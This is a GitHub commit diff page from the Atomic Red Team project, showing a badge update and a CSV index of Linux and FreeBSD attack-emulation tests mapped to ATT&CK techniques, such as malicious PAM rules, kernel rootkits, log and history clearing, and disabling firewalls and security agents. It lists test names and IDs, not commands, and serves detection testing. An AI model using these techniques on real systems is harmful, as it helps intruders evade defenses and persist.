Merge branch 'master' into master

This commit is contained in:
Hare Sudhan
2023-11-06 17:43:37 -05:00
committed by GitHub
170 changed files with 3922 additions and 1311 deletions
+1 -1
View File
@@ -16,7 +16,7 @@
# Atomic Red Team
![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1389-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1477-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
File diff suppressed because one or more lines are too long
+115
View File
@@ -1,5 +1,6 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM rule (freebsd),b17eacac-282d-4ca8-a240-46602cf863e3,sh
defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,3,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",1,chmod - Change file or folder mode (numeric mode),34ca1464-de9d-40c6-8c77-690adf36a135,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",2,chmod - Change file or folder mode (symbolic mode),fc9d6695-d022-4a80-91b1-381f5c35aff3,sh
@@ -10,33 +11,54 @@ defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD,
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",10,chflags - Remove immutable file attribute,60eee3ea-2ebd-453b-a666-c52ce08d2709,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",11,Chmod through c script,973631cf-6680-4ffa-a053-045e1b6b67ab,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",12,Chmod through c script (freebsd),da40b5fe-3098-4b3b-a410-ff177e49ee2e,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",13,Chown through c script,18592ba1-5f88-4e3c-abc8-ab1c6042e389,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",14,Chown through c script (freebsd),eb577a19-b730-4918-9b03-c5edcf51dc4e,sh
defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh
defense-evasion,T1014,Rootkit,3,dynamic-linker based rootkit (libprocesshider),1338bf0c-fd0c-48c0-9e65-329f18e2c0d3,sh
defense-evasion,T1014,Rootkit,4,Loadable Kernel Module based Rootkit (Diamorphine),0b996469-48c6-46e2-8155-a17f8b6c2247,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Sudo usage (freebsd),2bf9a018-4664-438a-b435-cc6f8c6f71b1,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,4,Unlimited sudo cache timeout (freebsd),a83ad6e8-6f24-4d7f-8f44-75f8ab742991,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,5,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,6,Disable tty_tickets for sudo caching (freebsd),4df6a0fe-2bdd-4be8-8618-a6a19654a57a,sh
defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (FreeBSD),e129d73b-3e03-4ae9-bf1e-67fc8921e0fd,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",2,rm -rf,bd8ccc45-d632-481e-b7cf-c467627d68f9,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",5,Truncate system log files via truncate utility (freebsd),14033063-ee04-4eaf-8f5d-ba07ca7a097c,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",7,Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd),369878c6-fb04-48d6-8fc2-da9d97b3e054,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",10,Overwrite FreeBSD system log via echo utility,11cb8ee1-97fb-4960-8587-69b8388ee9d9,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",13,Delete system log files via unlink utility (freebsd),45ad4abd-19bd-4c5f-a687-41f3eee8d8c2,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",18,Delete system journal logs via rm and journalctl utilities,ca50dd85-81ff-48ca-92e1-61f119cb1dcf,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",19,Overwrite Linux Mail Spool,1602ff76-ed7f-4c94-b550-2f727b4782d4,bash
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",20,Overwrite Linux Log,d304b2dc-90b4-4465-a650-16ddd503f7b5,bash
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,2,Clear sh history (rm),448893f8-1d5d-4ae2-9017-7fcd73a7e100,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,3,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,4,Clear sh history (echo),a4d63cb3-9ed9-4837-9480-5bf6b09a6c96,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,5,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,6,Clear sh history (cat dev/null),ecaefd53-6fa4-4781-ba51-d9d6fb94dbdc,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,7,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,8,Clear sh history (ln dev/null),3126aa7a-8768-456f-ae05-6ab2d4accfdd,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,9,Clear Bash history (truncate),47966a1d-df4f-4078-af65-db6d9aa20739,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,10,Clear sh history (truncate),e14d9bb0-c853-4503-aa89-739d5c0a5818,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,11,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,12,Clear history of a bunch of shells (freebsd),9bf7c8af-5e12-42ea-bf6b-b0348fb9dfb0,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,13,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,14,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,15,Disable Bash History Logging with SSH -T,5f8abd62-f615-43c5-b6be-f780f25790a1,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,16,Disable sh History Logging with SSH -T (freebsd),ec3f2306-dd19-4c4b-bed7-92d20e9b1dee,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,3,Base64 decoding with Python,356dc0e8-684f-4428-bb94-9313998ad608,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,4,Base64 decoding with Perl,6604d964-b9f6-4d4b-8ce8-499829a14d0a,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding with shell utilities,b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,6,Base64 decoding with shell utilities (freebsd),b6097712-c42e-4174-b8f2-4b1e1a5bbb3d,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,7,FreeBSD b64encode Shebang in CLI,18ee2002-66e8-4518-87c5-c0ec9c8299ac,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,8,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,9,Linux Base64 Encoded Shebang in CLI,3a15c372-67c1-4430-ac8e-ec06d641ce4d,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,10,XOR decoding and command execution using Python,c3b65cd5-ee51-4e98-b6a3-6cbdec138efc,bash
@@ -49,9 +71,11 @@ defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,2,Set a file's mo
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,4,Modify file timestamps using reference file,631ea661-d661-44b0-abdb-7a7f3fc08e50,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,7,Stop/Start UFW firewall,fe135572-edcd-49a2-afe6-1d39521c5a9a,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,8,Stop/Start Packet Filter,0ca82ed1-0a94-4774-9a9a-a2c83a8022b7,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,9,Stop/Start UFW firewall systemctl,9fd99609-1854-4f3c-b47b-97d9a5972bd1,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,10,Turn off UFW logging,8a95b832-2c2a-494d-9cb0-dc9dd97c8bad,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,11,Add and delete UFW firewall rules,b2563a4e-c4b8-429c-8d47-d5bcb227ba7a,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,12,Add and delete Packet Filter rules,8b23cae1-66c1-41c5-b79d-e095b6098b5b,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,13,Edit UFW firewall user.rules file,beaf815a-c883-4194-97e9-fdbbb2bbdd7c,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,14,Edit UFW firewall ufw.conf file,c1d8c4eb-88da-4927-ae97-c7c25893803b,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,15,Edit UFW firewall sysctl.conf file,c4ae0701-88d3-4cd8-8bce-4801ed9f97e4,sh
@@ -64,23 +88,32 @@ defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,2,Pad
defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2,Make and modify binary from C source (freebsd),dd580455-d84b-481b-b8b0-ac96f3b1dc4c,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,4,Set a SetUID flag on file (freebsd),9be9b827-ff47-4e1b-bef8-217db6fb7283,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,5,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,6,Set a SetGID flag on file (freebsd),1f73af33-62a8-4bf1-bd10-3bea931f2c0d,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,7,Make and modify capabilities of a binary,db53959c-207d-4000-9e7a-cd8eb417e072,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,8,Provide the SetUID capability to a file,1ac3272f-9bcf-443a-9888-4b1d3de785c1,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,9,Do reconnaissance for files that have the setuid bit set,8e36da01-cd29-45fd-be72-8a0fcaad4481,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,10,Do reconnaissance for files that have the setgid bit set,3fb46e17-f337-4c14-9f9a-a471946533e2,sh
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,1,Auditing Configuration Changes on Linux Host,212cfbcf-4770-4980-bc21-303e37abd0e3,bash
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,2,Auditing Configuration Changes on FreeBSD Host,cedaf7e7-28ee-42ab-ba13-456abd35d1bd,sh
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,3,Logging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,4,Logging Configuration Changes on FreeBSD Host,6b8ca3ab-5980-4321-80c3-bcd77c8daed8,sh
defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,3,linux rename /proc/pid/comm using prctl,f0e3aaea-5cd9-4db6-a077-631dd19b27a8,sh
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,2,Disable history collection (freebsd),cada55b4-8251-4c60-819e-8ec1b33c9306,sh
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,3,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,4,Clear bash history,878794f7-c511-4199-a950-8c28b3ed8e5b,bash
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,5,Setting the HISTCONTROL environment variable,10ab786a-028e-4465-96f6-9e83ca6c5f24,bash
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,6,Setting the HISTFILESIZE environment variable,5cafd6c1-2f43-46eb-ac47-a5301ba0a618,bash
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,7,Setting the HISTSIZE environment variable,386d3850-2ce7-4508-b56b-c0558922c814,sh
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,8,Setting the HISTFILE environment variable,b3dacb6c-a9e3-44ec-bf87-38db60c5cad1,bash
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,9,Setting the HISTFILE environment variable (freebsd),f7308845-6da8-468e-99f2-4271f2f5bb67,sh
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,10,Setting the HISTIGNORE environment variable,f12acddb-7502-4ce6-a146-5b62c59592f1,bash
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,1,Disable syslog,4ce786f8-e601-44b5-bfae-9ebb15a7d1c8,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,2,Disable syslog (freebsd),db9de996-441e-4ae0-947b-61b6871e2fdf,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,3,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,4,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,5,Stop Crowdstrike Falcon on Linux,828a1278-81cc-4802-96ab-188bf29ca77d,sh
@@ -91,8 +124,10 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,42,Clear Pagg
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,43,Disable Memory Swap,e74e4c63-6fde-4ad2-9ee8-21c3a1733114,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,47,Tamper with Defender ATP on Linux/MacOS,40074085-dbc8-492b-90a3-11bcfc52fda8,sh
defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
defense-evasion,T1027,Obfuscated Files or Information,2,Decode base64 Data into Script,197ed693-08e6-4958-bfd8-5974e291be6c,sh
defense-evasion,T1036.003,Masquerading: Rename System Utilities,2,Masquerading as FreeBSD or Linux crond process.,a315bfff-7a98-403b-b442-2ea1b255e556,sh
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,2,Install root CA on FreeBSD,f4568003-1438-44ab-a234-b3252ea7e7a3,sh
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,3,Install root CA on Debian/Ubuntu,53bcf8a0-1549-4b85-b919-010c56d724ff,sh
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,3,C compile,d0377aa6-850a-42b2-95f0-de558d80be57,sh
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,4,CC compile,da97bb11-d6d0-4fc1-b445-e443d1346efe,sh
@@ -101,27 +136,38 @@ defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,1,Delete a si
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,2,Delete an entire folder - FreeBSD/Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f10-4485-ad26-abf22a764c52,bash
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,9,Delete Filesystem - FreeBSD,b5aaca7e-a48f-4f1b-8f0f-a27b8f516608,sh
defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,1,Binary simply packed by UPX (linux),11c46cd8-e471-450e-acb8-52a1216ae6a4,sh
defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,2,"Binary packed by UPX, with modified headers (linux)",f06197f8-ff46-48c2-a0c6-afc1b50665e1,sh
defense-evasion,T1036.006,Masquerading: Space after Filename,2,Space After Filename,b95ce2eb-a093-4cd8-938d-5258cef656ea,bash
defense-evasion,T1036.006,Masquerading: Space after Filename,3,Space After Filename (FreeBSD),cfc1fbb5-caae-4f4c-bfa8-1b7c8b5cc4e8,sh
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,1,Create a hidden file in a hidden directory,61a782e5-9a19-40b5-8ba4-69a4b9f3d7be,sh
defense-evasion,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh
defense-evasion,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
defense-evasion,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM rule (freebsd),b17eacac-282d-4ca8-a240-46602cf863e3,sh
persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,3,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
persistence,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,sh
persistence,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
persistence,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /etc/cron.d folder,078e69eb-d9fb-450e-b9d0-2e118217c846,sh
persistence,T1053.003,Scheduled Task/Job: Cron,4,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
persistence,T1176,Browser Extensions,1,Chrome/Chromium (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
persistence,T1176,Browser Extensions,2,Chrome/Chromium (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
persistence,T1546.005,Event Triggered Execution: Trap,2,Trap EXIT (freebsd),be1a5d70-6865-44aa-ab50-42244c9fd16f,sh
persistence,T1546.005,Event Triggered Execution: Trap,3,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
persistence,T1546.005,Event Triggered Execution: Trap,4,Trap SIGINT (freebsd),ade10242-1eac-43df-8412-be0d4c704ada,sh
persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
persistence,T1136.001,Create Account: Local Account,1,Create a user account on a Linux system,40d8eabd-e394-46f6-8785-b9bfa1d011d2,bash
persistence,T1136.001,Create Account: Local Account,2,Create a user account on a FreeBSD system,a39ee1bc-b8c1-4331-8e5f-1859eb408518,sh
persistence,T1136.001,Create Account: Local Account,6,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash
persistence,T1136.001,Create Account: Local Account,7,Create a new user in FreeBSD with `root` GID.,d141afeb-d2bc-4934-8dd5-b7dba0f9f67a,sh
persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,sh
persistence,T1136.002,Create Account: Domain Account,4,Active Directory Create Admin Account,562aa072-524e-459a-ba2b-91f1afccf5ab,sh
persistence,T1136.002,Create Account: Domain Account,5,Active Directory Create User Account (Non-elevated),8c992cb3-a46e-4fd5-b005-b1bab185af31,sh
@@ -131,20 +177,29 @@ persistence,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level t
persistence,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,3,Add command to .shrc,41502021-591a-4649-8b6e-83c9192aff53,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,4,Append to the system shell profile,694b3cc8-6a78-4d35-9e74-0123d009e94b,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,5,Append commands user shell profile,bbdb06bc-bab6-4f5b-8232-ba3fbed51d77,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,6,System shell profile scripts,8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,7,Create/Append to .bash_logout,37ad2f24-7c53-4a50-92da-427a4ad13f58,bash
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,4,rc.local (FreeBSD),2015fb48-8ab6-4fbf-928b-0b62de5c9476,sh
persistence,T1543.002,Create or Modify System Process: SysV/Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
persistence,T1543.002,Create or Modify System Process: SysV/Systemd Service,2,Create SysV Service,760fe8d2-79d9-494f-905e-a239a3df86f6,sh
persistence,T1543.002,Create or Modify System Process: SysV/Systemd Service,3,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
persistence,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
persistence,T1053.002,Scheduled Task/Job: At,3,At - Schedule a job freebsd,549863fb-1c91-467e-97fc-1fa32b9f356b,sh
persistence,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
persistence,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh
persistence,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
persistence,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
persistence,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
persistence,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
command-and-control,T1132.001,Data Encoding: Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
command-and-control,T1132.001,Data Encoding: Standard Encoding,2,Base64 Encoded data (freebsd),2d97c626-7652-449e-a986-b02d9051c298,sh
command-and-control,T1090.003,Proxy: Multi-hop Proxy,3,Tor Proxy Usage - Debian/Ubuntu,5ff9d047-6e9c-4357-b39b-5cf89d9b59c7,sh
command-and-control,T1090.003,Proxy: Multi-hop Proxy,5,Tor Proxy Usage - FreeBSD,550ec67d-a99e-408b-816a-689271b27d2a,sh
command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
command-and-control,T1071.001,Application Layer Protocol: Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh
command-and-control,T1105,Ingress Tool Transfer,1,rsync remote file copy (push),0fc6e977-cb12-44f6-b263-2824ba917409,sh
